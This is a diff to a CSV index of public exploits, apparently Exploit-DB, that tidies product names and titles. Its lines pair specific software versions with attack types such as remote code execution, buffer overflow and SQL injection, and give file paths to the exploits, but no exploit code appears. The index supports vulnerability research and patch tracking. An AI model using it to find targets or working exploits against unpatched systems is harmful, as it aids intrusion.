-18405,8 +18405,8 @@ id,file,description,date,author,platform,type,port 21094,platforms/aix/local/21094.c,"AIX 4.2/4.3 - piomkapqd Buffer Overflow",2000-09-01,"Last Stage of Delirium",aix,local,0 21095,platforms/linux/remote/21095.txt,"RedHat 6.2/7.0/7.1 Lpd - Remote Command Execution via DVI Printfilter Configuration Error",2001-08-27,"zenith parsec",linux,remote,0 21096,platforms/windows/local/21096.txt,"Outlook Express 6 - Attachment Security Bypass",2001-08-30,http-equiv,windows,local,0 -21097,platforms/solaris/remote/21097.txt,"Solaris 2.x/7.0/8 lpd - Remote Command Execution",2001-08-31,ron1n,solaris,remote,0 -21098,platforms/hp-ux/local/21098.c,"HP-UX 11.0 SWVerify - Buffer Overflow",2001-09-03,foo,hp-ux,local,0 +21097,platforms/solaris/remote/21097.txt,"Solaris 2.x/7.0/8 LPD - Remote Command Execution",2001-08-31,ron1n,solaris,remote,0 +21098,platforms/hp-ux/local/21098.c,"HP-UX 11.0 - SWVerify Buffer Overflow",2001-09-03,foo,hp-ux,local,0 40419,platforms/linux/dos/40419.c,"Linux - SELinux W+X Protection Bypass via AIO",2016-09-23,"Google Security Research",linux,dos,0 21099,platforms/windows/dos/21099.c,"Microsoft Windows 2000 - RunAs Service Denial of Service",2001-12-11,Camisade,windows,dos,0 21100,platforms/multiple/remote/21100.pl,"Cisco Secure IDS 2.0/3.0 / Snort 1.x / ISS RealSecure 5/6 / NFR 5.0 - Encoded IIS Attack Detection Evasion",2001-09-05,blackangels,multiple,remote,0 @@ -18597,8 +18597,8 @@ id,file,description,date,author,platform,type,port 21288,platforms/multiple/local/21288.txt,"Sawmill 6.2.x - AdminPassword Insecure Default Permissions",2002-02-11,darky0da,multiple,local,0 21289,platforms/linux/remote/21289.c,"Ettercap 0.6.3.1 - Large Packet Buffer Overflow",2002-02-14,"Fermín J. Serna",linux,remote,0 21290,platforms/unix/local/21290.sh,"Tarantella Enterprise 3 - Symbolic Link",2002-02-19,"Larry W. Cashdollar",unix,local,0 -21291,platforms/windows/remote/21291.pl,"phusion WebServer 1.0 - Directory Traversal (1)",2002-02-16,"Alex Hernandez",windows,remote,0 -21292,platforms/windows/remote/21292.pl,"phusion WebServer 1.0 - Directory Traversal (2)",2002-02-16,"Alex Hernandez",windows,remote,0 +21291,platforms/windows/remote/21291.pl,"Phusion WebServer 1.0 - Directory Traversal (1)",2002-02-16,"Alex Hernandez",windows,remote,0 +21292,platforms/windows/remote/21292.pl,"Phusion WebServer 1.0 - Directory Traversal (2)",2002-02-16,"Alex Hernandez",windows,remote,0 21293,platforms/windows/dos/21293.pl,"Phusion WebServer 1.0 - Long URL Denial of Service",2002-02-16,"Alex Hernandez",windows,dos,0 21294,platforms/windows/remote/21294.c,"Phusion WebServer 1.0 - Long URL Buffer Overflow",2002-02-16,"Alex Hernandez",windows,remote,0 21295,platforms/multiple/remote/21295.txt,"GNUJSP 1.0 - File Disclosure",2002-02-19,"Thomas Springer",multiple,remote,0 @@ -18659,7 +18659,7 @@ id,file,description,date,author,platform,type,port 21356,platforms/linux/local/21356.sh,"LogWatch 2.1.1/2.5 - Insecure Temporary Directory Creation",2002-03-27,spybreak,linux,local,0 21357,platforms/php/webapps/21357.txt,"PostNuke 0.703 - caselist Arbitrary Module Include",2002-03-28,"pokleyzz sakamaniaka",php,webapps,0 21358,platforms/php/webapps/21358.sh,"SquirrelMail 1.2.x - Theme Remote Command Execution",2002-03-28,"pokleyzz sakamaniaka",php,webapps,0 -21359,platforms/multiple/local/21359.c,"Progress 9.1 - sqlcpp Local Buffer Overflow",2002-03-22,kf,multiple,local,0 +21359,platforms/multiple/local/21359.c,"Progress Database 9.1 - sqlcpp Local Buffer Overflow",2002-03-22,kf,multiple,local,0 21360,platforms/solaris/local/21360.c,"Sun Solaris 2.6/7.0/8 - XSun Color Database File Heap Overflow",2002-04-02,gloomy,solaris,local,0 21361,platforms/windows/remote/21361.txt,"Microsoft Internet Explorer 5 - Cascading Style Sheet File Disclosure",2002-04-02,"GreyMagic Software",windows,remote,0 21362,platforms/linux/local/21362.c,"Oracle 8i - TNS Listener Local Command Parameter Buffer Overflow",2002-04-01,"the itch",linux,local,0 @@ -18710,7 +18710,7 @@ id,file,description,date,author,platform,type,port 21406,platforms/cgi/webapps/21406.txt,"Philip Chinery's Guestbook 1.1 - Script Injection",2002-04-21,"markus arndt",cgi,webapps,0 21407,platforms/bsd/local/21407.c,"Apple Mac OSX 10.x / FreeBSD 4.x / OpenBSD 2.x / Solaris 2.5/2.6/7.0/8 - exec C Library Standard I/O File Descriptor Closure",2002-04-23,phased,bsd,local,0 21408,platforms/unix/local/21408.pl,"SLRNPull 0.9.6 - Spool Directory Command Line Parameter Buffer Overflow",2002-04-22,zillion,unix,local,0 -21409,platforms/unix/dos/21409.pl,"PsyBNC 2.3 - Oversized Passwords Denial of Service",2002-04-22,DVDMAN,unix,dos,0 +21409,platforms/unix/dos/21409.pl,"psyBNC 2.3 - Oversized Passwords Denial of Service",2002-04-22,DVDMAN,unix,dos,0 21410,platforms/windows/remote/21410.pl,"Matu FTP 1.74 - Client Buffer Overflow",2002-04-23,Kanatoko,windows,remote,0 21411,platforms/cgi/webapps/21411.txt,"vqServer 1.9.x - CGI Demo Program Script Injection",2002-04-21,"Matthew Murphy",cgi,webapps,0 21412,platforms/unix/remote/21412.txt,"Apache Tomcat 4.0/4.1 - Servlet Full Path Disclosure",2002-04-23,"CHINANSL Security Team",unix,remote,0 @@ -18742,8 +18742,8 @@ id,file,description,date,author,platform,type,port 21439,platforms/windows/remote/21439.txt,"MDaemon WorldClient 5.0.x - Folder Creation Buffer Overflow",2002-05-07,Obscure,windows,remote,0 21440,platforms/bsd/remote/21440.c,"ISC DHCPD 2.0/3.0.1 - NSUPDATE Remote Format String",2002-05-08,Andi,bsd,remote,0 21441,platforms/hardware/remote/21441.txt,"Cisco ATA-186 - HTTP Device Configuration Disclosure",2002-05-09,"Patrick Michael Kane",hardware,remote,0 -21442,platforms/linux/remote/21442.c,"Wu-imapd 2000/2001 - Partial Mailbox Attribute Remote Buffer Overflow (1)",2002-05-10,korty,linux,remote,0 -21443,platforms/linux/remote/21443.c,"Wu-imapd 2000/2001 - Partial Mailbox Attribute Remote Buffer Overflow (2)",2002-05-10,"0x3a0x29 crew",linux,remote,0 +21442,platforms/linux/remote/21442.c,"WU-IMAPd 2000/2001 - Partial Mailbox Attribute Remote Buffer Overflow (1)",2002-05-10,korty,linux,remote,0 +21443,platforms/linux/remote/21443.c,"WU-IMAPd 2000/2001 - Partial Mailbox Attribute Remote Buffer Overflow (2)",2002-05-10,"0x3a0x29 crew",linux,remote,0 21444,platforms/multiple/remote/21444.txt,"Critical Path InJoin Directory Server 4.0 - Cross-Site Scripting",2002-05-10,"Nomad Mobile Research Centre",multiple,remote,0 21445,platforms/multiple/remote/21445.txt,"Critical Path InJoin Directory Server 4.0 - File Disclosure",2002-05-10,"Nomad Mobile Research Centre",multiple,remote,0 21446,platforms/windows/remote/21446.txt,"Ecometry SGDynamo 5.32/6.1/7.0 - Cross-Site Scripting",2002-04-17,frog,windows,remote,0 @@ -19195,7 +19195,7 @@ id,file,description,date,author,platform,type,port 21893,platforms/php/webapps/21893.php,"TightAuction 3.0 - Config.INC Information Disclosure",2002-10-02,frog,php,webapps,0 21894,platforms/php/webapps/21894.txt,"Midicart PHP - Information Disclosure",2002-10-02,frog,php,webapps,0 21895,platforms/cgi/webapps/21895.txt,"Jetty 3.1.6/3.1.7/4.1 Servlet Engine - Arbitrary Command Execution",2002-10-02,"Matt Moore",cgi,webapps,0 -21896,platforms/php/webapps/21896.txt,"Midicart - PHP Arbitrary File Upload",2002-10-02,frog,php,webapps,0 +21896,platforms/php/webapps/21896.txt,"Midicart PHP - Arbitrary File Upload",2002-10-02,frog,php,webapps,0 21897,platforms/windows/remote/21897.txt,"SurfControl SuperScout WebFilter for windows 2000 - File Disclosure",2002-10-02,"Matt Moore",windows,remote,0 21898,platforms/windows/remote/21898.txt,"SurfControl SuperScout WebFilter for windows 2000 - SQL Injection",2002-10-02,"Matt Moore",windows,remote,0 21899,platforms/php/webapps/21899.txt,"phpWebSite 0.8.3 - article.php Cross-Site Scripting",2002-10-02,Sp.IC,php,webapps,0 @@ -19365,7 +19365,7 @@ id,file,description,date,author,platform,type,port 22067,platforms/unix/local/22067.txt,"SAP DB 7.3.00 - Symbolic Link",2002-12-04,"SAP Security",unix,local,0 22068,platforms/unix/dos/22068.pl,"Apache 1.3.x + Tomcat 4.0.x/4.1.x Mod_JK - Chunked Encoding Denial of Service",2002-12-04,Sapient2003,unix,dos,0 22069,platforms/multiple/local/22069.py,"Oracle Database - Protocol Authentication Bypass",2012-10-18,"Esteban Martinez Fayo",multiple,local,0 -22070,platforms/windows/webapps/22070.py,"otrs 3.1 - Persistent Cross-Site Scripting",2012-10-18,"Mike Eduard",windows,webapps,0 +22070,platforms/windows/webapps/22070.py,"OTRS 3.1 - Persistent Cross-Site Scripting",2012-10-18,"Mike Eduard",windows,webapps,0 22071,platforms/php/webapps/22071.txt,"WordPress Plugin FireStorm Professional Real Estate 2.06.01 - SQL Injection",2012-10-18,"Ashiyane Digital Security Team",php,webapps,0 22074,platforms/osx/dos/22074.txt,"Apple Mac OSX 10.2.2 - Directory Kernel Panic Denial of Service",2002-11-07,shibby,osx,dos,0 22075,platforms/php/webapps/22075.txt,"Ultimate PHP Board 1.0 final Beta - viewtopic.php Directory Contents Browsing",2002-11-08,euronymous,php,webapps,0 @@ -19413,7 +19413,7 @@ id,file,description,date,author,platform,type,port 22119,platforms/windows/dos/22119.html,"Microsoft PoCket Internet Explorer 3.0 - Denial of Service",2003-01-03,"Christopher Sogge Røtnes",windows,dos,0 22120,platforms/solaris/local/22120.c,"Sun Solaris 2.5.1/2.6/7.0/8/9 Wall - Spoofed Message Origin",2003-01-03,"Brant Roman",solaris,local,0 22121,platforms/windows/dos/22121.pl,"EType EServ 2.9x - FTP Remote Denial of Service",2003-01-04,D4rkGr3y,windows,dos,0 -22122,platforms/windows/dos/22122.pl,"EType EServ 2.9x POP3 - Remote Denial of Service",2003-01-04,D4rkGr3y,windows,dos,0 +22122,platforms/windows/dos/22122.pl,"EType EServ 2.9x - POP3 Remote Denial of Service",2003-01-04,D4rkGr3y,windows,dos,0 22123,platforms/windows/dos/22123.pl,"EType EServ 2.9x - SMTP Remote Denial of Service",2003-01-04,D4rkGr3y,windows,dos,0 22124,platforms/windows/dos/22124.pl,"EType EServ 1.9x - NNTP Remote Denial of Service",2003-01-04,D4rkGr3y,windows,dos,0 22125,platforms/php/webapps/22125.txt,"OpenTopic 2.3.1 - Private Message HTML Injection",2003-01-06,frog,php,webapps,0 @@ -19684,7 +19684,7 @@ id,file,description,date,author,platform,type,port 22395,platforms/windows/dos/22395.txt,"eDonkey Clients 0.44/0.45 - Multiple Chat Dialog Resource Consumption",2003-03-21,"Auriemma Luigi",windows,dos,0 22396,platforms/php/webapps/22396.txt,"WordPress Plugin bbPress - Multiple Vulnerabilities",2012-11-01,Dark-Puzzle,php,webapps,0 22397,platforms/windows/dos/22397.txt,"SIEMENS Sipass Integrated 2.6 Ethernet Bus - Arbitrary Pointer Dereference",2012-11-01,"Lucas Apa",windows,dos,0 -22398,platforms/php/webapps/22398.php,"Invision Power Board 3.3.4 - 'Unserialize()' PHP Code Execution",2012-11-01,EgiX,php,webapps,0 +22398,platforms/php/webapps/22398.php,"Invision Power Board (IP.Board) 3.3.4 - 'Unserialize()' PHP Code Execution",2012-11-01,EgiX,php,webapps,0 22399,platforms/php/webapps/22399.txt,"Endpoint Protector 4.0.4.2 - Multiple Persistent Cross-Site Scripting",2012-11-01,"CYBSEC Labs",php,webapps,0 22401,platforms/windows/dos/22401.php,"Microsoft Internet Explorer 9 - Memory Corruption Crash (PoC)",2012-11-01,"Jean Pascal Pereira",windows,dos,0 22402,platforms/windows/dos/22402.txt,"RealPlayer 15.0.6.14(.3g2) - WriteAV Crash (PoC)",2012-11-01,coolkaveh,windows,dos,0 @@ -19830,7 +19830,7 @@ id,file,description,date,author,platform,type,port 22544,platforms/cfm/webapps/22544.txt,"Macromedia ColdFusion MX 6.0 - Error Message Full Path Disclosure",2003-04-26,"Network Intelligence",cfm,webapps,0 22545,platforms/cgi/webapps/22545.pl,"Mike Bobbitt Album.PL 0.61 - Remote Command Execution",2003-04-26,aresu@bosen.net,cgi,webapps,0 22546,platforms/windows/remote/22546.txt,"Opera 7.0/7.10 - JavaScript Console Single Quote Attribute Injection",2003-04-28,nesumin,windows,remote,0 -22547,platforms/php/webapps/22547.php,"Invision Power Board 3.3.4 - Unserialize Regex Bypass",2012-11-07,webDEViL,php,webapps,0 +22547,platforms/php/webapps/22547.php,"Invision Power Board (IP.Board) 3.3.4 - Unserialize Regex Bypass",2012-11-07,webDEViL,php,webapps,0 22548,platforms/php/webapps/22548.txt,"Xivo 1.2 - Arbitrary File Download",2012-11-07,Mr.Un1k0d3r,php,webapps,0 22549,platforms/hardware/webapps/22549.txt,"AVerCaster Pro RS3400 Web Server - Directory Traversal",2012-11-07,"Patrick Saladino",hardware,webapps,0 22550,platforms/windows/dos/22550.pl,"Opera 6.0.x/7.0 - Long File Name Remote Heap Corruption",2003-04-28,"imagine & nesumin",windows,dos,0 @@ -19858,8 +19858,8 @@ id,file,description,date,author,platform,type,port 22574,platforms/freebsd/local/22574.pl,"Lgames LTris 1.0.1 - Local Memory Corruption",2003-05-09,"Knud Erik Hojgaard",freebsd,local,0 22575,platforms/windows/remote/22575.txt,"Microsoft Internet Explorer 5/6 - 'file://' Request Zone Bypass",2003-05-09,"Marek Bialoglowy",windows,remote,0 22576,platforms/windows/dos/22576.txt,"Microsoft SQL Server 7.0/2000 JET Database Engine 4.0 - Buffer Overrun",2003-05-09,cesaro,windows,dos,0 -22577,platforms/php/webapps/22577.txt,"ttCMS 2.2 - / ttForum 1.1 news.php template Parameter Remote File Inclusion",2003-05-09,"Charles Reinold",php,webapps,0 -22578,platforms/php/webapps/22578.txt,"ttCMS 2.2 - / ttForum 1.1 install.php installdir Parameter Remote File Inclusion",2003-05-09,"Charles Reinold",php,webapps,0 +22577,platforms/php/webapps/22577.txt,"ttCMS 2.2 / ttForum 1.1 - news.php template Parameter Remote File Inclusion",2003-05-09,"Charles Reinold",php,webapps,0 +22578,platforms/php/webapps/22578.txt,"ttCMS 2.2 / ttForum 1.1 - install.php installdir Parameter Remote File Inclusion",2003-05-09,"Charles Reinold",php,webapps,0 22579,platforms/php/webapps/22579.txt,"Phorum 3.4.x - Message Form Field HTML Injection Variant",2003-05-09,WiciU,php,webapps,0 22580,platforms/freebsd/local/22580.c,"Firebird 1.0 - GDS_Inet_Server Interbase Environment Variable Buffer Overflow",2003-05-10,bob,freebsd,local,0 22581,platforms/windows/dos/22581.pl,"Youngzsoft CMailServer 4.0 - MAIL FROM Buffer Overflow",2003-05-10,"Dennis Rand",windows,dos,0 @@ -19966,7 +19966,7 @@ id,file,description,date,author,platform,type,port 22683,platforms/linux/local/22683.pl,"HT Editor 2.0.20 - Buffer Overflow (ROP PoC)",2012-11-13,ZadYree,linux,local,0 22684,platforms/php/webapps/22684.txt,"Eventy CMS 1.8 Plus - Multiple Vulnerabilities",2012-11-13,Vulnerability-Lab,php,webapps,0 22685,platforms/windows/dos/22685.txt,"Zoner Photo Studio 15 b3 - Buffer Overflow",2012-11-13,Vulnerability-Lab,windows,dos,0 -22686,platforms/php/remote/22686.rb,"Invision IP.Board 3.3.4 - Unserialize() PHP Code Execution (Metasploit)",2012-11-13,Metasploit,php,remote,0 +22686,platforms/php/remote/22686.rb,"Invision Power Board (IP.Board) 3.3.4 - Unserialize() PHP Code Execution (Metasploit)",2012-11-13,Metasploit,php,remote,0 22687,platforms/php/webapps/22687.pl,"Webfroot Shoutbox 2.32 - Remote Command Execution",2003-05-29,pokleyzz,php,webapps,0 40411,platforms/windows/dos/40411.txt,"JCraft/JSch Java Secure Channel 0.1.53 - Recursive sftp-get Directory Traversal",2016-09-22,tintinweb,windows,dos,0 22688,platforms/cgi/webapps/22688.txt,"M-TECH P-Synch 6.2.5 - nph-psf.exe css Parameter Remote File Inclusion",2003-05-29,JeiAr,cgi,webapps,0 @@ -20066,7 +20066,7 @@ id,file,description,date,author,platform,type,port 22784,platforms/windows/remote/22784.txt,"Microsoft Internet Explorer 5 - Custom HTTP Error HTML Injection",2003-06-17,"GreyMagic Software",windows,remote,0 22785,platforms/windows/remote/22785.txt,"MyServer 0.4.1/0.4.2 - HTTP Server Directory Traversal",2003-06-17,"Ziv Kamir",windows,remote,0 22786,platforms/linux/remote/22786.c,"Dune 0.6.7 - HTTP Get Remote Buffer Overrun",2003-06-17,V9,linux,remote,0 -22787,platforms/windows/remote/22787.rb,"NFR Agent FSFUI Record - Arbitrary File Upload / Remote Code Execution (Metasploit)",2012-11-19,Metasploit,windows,remote,0 +22787,platforms/windows/remote/22787.rb,"Novell File Reporter (NFR) Agent FSFUI Record - Arbitrary File Upload / Remote Code Execution (Metasploit)",2012-11-19,Metasploit,windows,remote,0 22788,platforms/windows/dos/22788.pl,"CesarFTP 0.99 g - Remote 'Username' Buffer Overrun",2003-03-30,dr_insane,windows,dos,0 22789,platforms/windows/dos/22789.pl,"CesarFTP 0.99 g - Remote CWD Denial of Service",2003-03-30,dr_insane,windows,dos,0 22790,platforms/windows/dos/22790.txt,"GuildFTPd 0.999.8 - CWD Command Denial of Service",2003-05-12,dr_insane,windows,dos,0 @@ -20080,7 +20080,7 @@ id,file,description,date,author,platform,type,port 22798,platforms/php/webapps/22798.txt,"phpMyAdmin 2.x - Information Disclosure",2003-06-18,"Lorenzo Manuel Hernandez Garcia-Hierro",php,webapps,0 22799,platforms/cgi/webapps/22799.txt,"Kerio MailServer 5.6.3 - Web Mail ADD_ACL Module Cross-Site Scripting",2003-06-18,"David F.Madrid",cgi,webapps,0 22800,platforms/linux/dos/22800.txt,"Kerio MailServer 5.6.3 subscribe Module - Overflow Exploit",2003-06-18,"David F.Madrid",linux,dos,0 -22801,platforms/linux/dos/22801.txt,"Kerio MailServer 5.6.3 - add_acl Module Overflow",2003-06-18,"David F.Madrid",linux,dos,0 +22801,platforms/linux/dos/22801.txt,"Kerio MailServer 5.6.3 add_acl Module - Overflow",2003-06-18,"David F.Madrid",linux,dos,0 22802,platforms/linux/dos/22802.txt,"Kerio MailServer 5.6.3 list Module - Overflow Exploit",2003-06-18,"David F.Madrid",linux,dos,0 22803,platforms/linux/dos/22803.txt,"Kerio MailServer 5.6.3 do_map Module - Overflow Exploit",2003-06-18,"David F.Madrid",linux,dos,0 22804,platforms/cgi/webapps/22804.txt,"Kerio MailServer 5.6.3 - Web Mail DO_MAP Module Cross-Site Scripting",2003-06-18,"David F.Madrid",cgi,webapps,0 @@ -20247,7 +20247,7 @@ id,file,description,date,author,platform,type,port 23013,platforms/php/webapps/23013.txt,"PHP Website 0.7.3/0.8.2/0.8.3/0.9.2 Calendar Module - SQL Injection",2003-08-11,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 23014,platforms/php/webapps/23014.txt,"phpWebSite 0.7.3/0.8.2/0.8.3/0.9.2 Calendar Module - 'day' Cross-Site Scripting",2003-08-11,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 23015,platforms/php/webapps/23015.txt,"phpWebSite 0.7.3/0.8.2/0.8.3/0.9.2 fatcat Module - fatcat_id Parameter Cross-Site Scripting",2003-08-11,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 -23016,platforms/php/webapps/23016.txt,"phpWebSite 0.7.3/0.8.2/0.8.3/0.9.2 - pagemaster Module PAGE_id Parameter Cross-Site Scripting",2003-08-11,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 +23016,platforms/php/webapps/23016.txt,"phpWebSite 0.7.3/0.8.2/0.8.3/0.9.2 pagemaster Module - PAGE_id Parameter Cross-Site Scripting",2003-08-11,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 22935,platforms/multiple/dos/22935.txt,"Websense Proxy - Filter Bypass",2012-11-26,"Nahuel Grisolia",multiple,dos,0 22936,platforms/php/webapps/22936.txt,"SmartCMS - 'index.php idx Parameter' SQL Injection",2012-11-26,NoGe,php,webapps,0 22937,platforms/php/webapps/22937.txt,"PRADO PHP Framework 3.2.0 - Arbitrary File Read",2012-11-26,LiquidWorm,php,webapps,0 @@ -20345,7 +20345,7 @@ id,file,description,date,author,platform,type,port 23071,platforms/multiple/remote/23071.txt,"SAP Internet Transaction Server 4620.2.0.323011 Build 46B.323011 - Cross-Site Scripting",2003-08-30,"Martin Eiszner",multiple,remote,0 23072,platforms/php/webapps/23072.txt,"Ezboard - 'invitefriends.php3' Cross-Site Scripting",2003-09-01,"David F. Madrid",php,webapps,0 23073,platforms/windows/remote/23073.txt,"MySQL 5.1/5.5 (Windows) - 'MySQLJackpot' Remote Root Exploit",2012-12-02,kingcope,windows,remote,0 -23074,platforms/windows/remote/23074.txt,"IBM System Director - Remote System Level Exploit",2012-12-02,kingcope,windows,remote,0 +23074,platforms/windows/remote/23074.txt,"IBM System Director Agent - Remote System Level Exploit",2012-12-02,kingcope,windows,remote,0 23075,platforms/linux/dos/23075.pl,"MySQL (Linux) - Stack Based Buffer Overrun (PoC)",2012-12-02,kingcope,linux,dos,0 23076,platforms/linux/dos/23076.pl,"MySQL (Linux) - Heap Based Overrun (PoC)",2012-12-02,kingcope,linux,dos,0 23077,platforms/linux/local/23077.pl,"MySQL (Linux) - Database Privilege Elevation Exploit",2012-12-02,kingcope,linux,local,0 @@ -20424,7 +20424,7 @@ id,file,description,date,author,platform,type,port 23153,platforms/cgi/webapps/23153.txt,"NetWin DBabble 2.5 i - Cross-Site Scripting",2003-09-16,dr_insane,cgi,webapps,0 23154,platforms/linux/local/23154.c,"Sendmail 8.12.9 - Prescan() Variant Remote Buffer Overrun",2003-09-17,"Gyan Chawdhary",linux,local,0 23155,platforms/windows/remote/23155.rb,"Ektron 8.02 - XSLT Transform Remote Code Execution (Metasploit)",2012-12-05,Metasploit,windows,remote,0 -23156,platforms/unix/remote/23156.rb,"Tectia SSH - USERAUTH Change Request Password Reset (Metasploit)",2012-12-05,Metasploit,unix,remote,0 +23156,platforms/unix/remote/23156.rb,"(SSH.com Communications) SSH Tectia - USERAUTH Change Request Password Reset (Metasploit)",2012-12-05,Metasploit,unix,remote,0 23157,platforms/windows/remote/23157.txt,"Plug and Play Web Server 1.0 002c - Directory Traversal",2003-09-18,"Bahaa Naamneh",windows,remote,0 23158,platforms/php/webapps/23158.txt,"Mambo Site Server 4.0.14 - banners.php bid Parameter SQL Injection",2003-09-18,"Lifo Fifo",php,webapps,0 23159,platforms/php/webapps/23159.txt,"Mambo Site Server 4.0.14 - emailarticle.php id Parameter SQL Injection",2003-09-18,"Lifo Fifo",php,webapps,0 @@ -20448,11 +20448,11 @@ id,file,description,date,author,platform,type,port 23176,platforms/multiple/remote/23176.txt,"NullLogic Null HTTPd 0.5.1 - Error Page Long HTTP Request Cross-Site Scripting",2003-09-24,"Luigi Auriemma",multiple,remote,0 23177,platforms/windows/dos/23177.txt,"Nvidia Install Application 2.1002.85.551 - 'NVI2.dll' Unicode Buffer Overflow (PoC)",2012-12-06,LiquidWorm,windows,dos,0 23178,platforms/multiple/remote/23178.rb,"Adobe IndesignServer 5.5 - SOAP Server Arbitrary Script Execution (Metasploit)",2012-12-06,Metasploit,multiple,remote,0 -23179,platforms/windows/remote/23179.rb,"Oracle MySQL for Microsoft Windows - MOF Execution (Metasploit)",2012-12-06,Metasploit,windows,remote,0 +23179,platforms/windows/remote/23179.rb,"Oracle MySQL (Windows) - MOF Execution (Metasploit)",2012-12-06,Metasploit,windows,remote,0 23180,platforms/php/webapps/23180.txt,"Kordil EDms 2.2.60rc3 - SQL Injection",2012-12-06,"Woody Hughes",php,webapps,0 23181,platforms/multiple/dos/23181.txt,"NullLogic Null HTTPd 0.5 - Remote Denial of Service",2003-09-24,"Luigi Auriemma",multiple,dos,0 -23182,platforms/linux/remote/23182.c,"CFEngine 2.0.x - CFServD Transaction Packet Buffer Overrun (1)",2003-09-25,jsk,linux,remote,0 -23183,platforms/linux/remote/23183.c,"CFEngine 2.0.x - CFServD Transaction Packet Buffer Overrun (2)",2003-11-04,snooq,linux,remote,0 +23182,platforms/linux/remote/23182.c,"GNU CFEngine 2.0.x - CFServD Transaction Packet Buffer Overrun (1)",2003-09-25,jsk,linux,remote,0 +23183,platforms/linux/remote/23183.c,"GNU CFEngine 2.0.x - CFServD Transaction Packet Buffer Overrun (2)",2003-11-04,snooq,linux,remote,0 23184,platforms/windows/webapps/23184.txt,"Software602 602Pro LAN SUITE 2003 - Sensitive User Information Storage",2003-09-25,"Phuong Nguyen",windows,webapps,0 23185,platforms/windows/remote/23185.txt,"software602 602pro lan suite 2003 - Directory Traversal",2003-09-25,"Phuong Nguyen",windows,remote,0 23186,platforms/linux/remote/23186.txt,"MPlayer 0.9/1.0 - Streaming ASX Header Parsing Buffer Overrun",2003-09-25,"Otero Hernan",linux,remote,0 @@ -20569,9 +20569,9 @@ id,file,description,date,author,platform,type,port 23296,platforms/linux/remote/23296.txt,"Red Hat Apache 2.0.40 - Directory Index Default Configuration Error",2003-10-27,TfM,linux,remote,0 23297,platforms/linux/local/23297.c,"Musicqueue 1.2 - SIGSEGV Signal Handler Insecure File Creation",2003-10-27,"dong-h0un U",linux,local,0 23298,platforms/windows/remote/23298.txt,"Macromedia Flash Player 6.0.x - Flash Cookie Predictable File Location",2003-10-24,Mindwarper,windows,remote,0 -23299,platforms/linux/local/23299.c,"IWConfig - Local ARGV Command Line Buffer Overflow (1)",2003-10-27,axis,linux,local,0 -23300,platforms/linux/local/23300.c,"IWConfig - Local ARGV Command Line Buffer Overflow (2)",2003-11-11,heka,linux,local,0 -23301,platforms/linux/local/23301.c,"IWConfig - Local ARGV Command Line Buffer Overflow (3)",2003-10-27,NrAziz,linux,local,0 +23299,platforms/linux/local/23299.c,"Wireless Tools 26 (IWConfig) - Local ARGV Command Line Buffer Overflow (1)",2003-10-27,axis,linux,local,0 +23300,platforms/linux/local/23300.c,"Wireless Tools 26 (IWConfig) - Local ARGV Command Line Buffer Overflow (2)",2003-11-11,heka,linux,local,0 +23301,platforms/linux/local/23301.c,"Wireless Tools 26 (IWConfig) - Local ARGV Command Line Buffer Overflow (3)",2003-10-27,NrAziz,linux,local,0 23302,platforms/php/webapps/23302.txt,"Les Visiteurs 2.0 - Remote File Inclusion",2003-10-27,"Matthieu Peschaud",php,webapps,0 23303,platforms/linux/local/23303.c,"Musicqueue 0.9/1.0/1.1 - Multiple Buffer Overrun Vulnerabilities",2003-10-27,"dong-h0un U",linux,local,0 23304,platforms/cgi/remote/23304.txt,"Symantec Norton Internet Security 2003 6.0.4.34 - Error Message Cross-Site Scripting",2003-10-27,KrazySnake,cgi,remote,0 @@ -20591,7 +20591,7 @@ id,file,description,date,author,platform,type,port 23320,platforms/multiple/remote/23320.txt,"Mldonkey 2.5 -4 - Web Interface Error Message Cross-Site Scripting",2003-10-31,"Chris Sharp",multiple,remote,0 23321,platforms/windows/remote/23321.txt,"Microsoft Internet Explorer 6 < 10 - Mouse Tracking",2012-12-12,"Nick Johnson",windows,remote,0 23322,platforms/php/webapps/23322.txt,"TipsOfTheDay MyBB Plugin - Multiple Vulnerabilities",2012-12-12,VipVince,php,webapps,0 -23323,platforms/windows/remote/23323.py,"Novell File Reporter Agent - XML Parsing Remote Code Execution",2012-12-12,Abysssec,windows,remote,0 +23323,platforms/windows/remote/23323.py,"Novell File Reporter (NFR) Agent - XML Parsing Remote Code Execution",2012-12-12,Abysssec,windows,remote,0 23324,platforms/windows/webapps/23324.txt,"Axway Secure Transport 5.1 SP2 - Directory Traversal",2012-12-12,"Sebastian Perez",windows,webapps,0 23325,platforms/multiple/dos/23325.c,"BRS Webweaver 1.06 httpd - 'User-Agent' Remote Denial of Service",2003-11-01,D4rkGr3y,multiple,dos,0 23326,platforms/asp/webapps/23326.txt,"http commander 4.0 - Directory Traversal",2003-11-01,"Zero X",asp,webapps,0 @@ -20849,8 +20849,8 @@ id,file,description,date,author,platform,type,port 23588,platforms/netware/remote/23588.txt,"Novell Netware Enterprise Web Server 5.1/6.0 SnoopServlet - Information Disclosure",2004-01-23,"Rafel Ivgi The-Insider",netware,remote,0 23589,platforms/netware/remote/23589.txt,"Novell Netware Enterprise Web Server 5.1/6.0 - Multiple Cross-Site Scripting Vulnerabilities",2004-01-23,"Rafel Ivgi The-Insider",netware,remote,0 23590,platforms/multiple/dos/23590.txt,"Reptile Web Server Reptile Web Server 20020105 - Denial of Service",2004-01-23,"Donato Ferrante",multiple,dos,0 -23591,platforms/windows/remote/23591.c,"RhinoSoft Serv-U FTP Server 3/4 - MDTM Command Stack Overflow (1)",2004-01-24,mandragore,windows,remote,0 -23592,platforms/windows/remote/23592.c,"RhinoSoft Serv-U FTP Server 3/4 - MDTM Command Stack Overflow (2)",2004-01-25,mslug@safechina.net,windows,remote,0 +23591,platforms/windows/remote/23591.c,"RhinoSoft Serv-U FTPd Server 3/4 - MDTM Command Stack Overflow (1)",2004-01-24,mandragore,windows,remote,0 +23592,platforms/windows/remote/23592.c,"RhinoSoft Serv-U FTPd Server 3/4 - MDTM Command Stack Overflow (2)",2004-01-25,mslug@safechina.net,windows,remote,0 23593,platforms/multiple/remote/23593.txt,"Oracle HTTP Server 8.1.7/9.0.1/9.2 - isqlplus Cross-Site Scripting",2004-01-24,"Rafel Ivgi The-Insider",multiple,remote,0 23594,platforms/windows/remote/23594.txt,"tinyserver 1.1 - Directory Traversal",2004-01-24,"Donato Ferrante",windows,remote,0 23595,platforms/windows/dos/23595.txt,"TinyServer 1.1 - 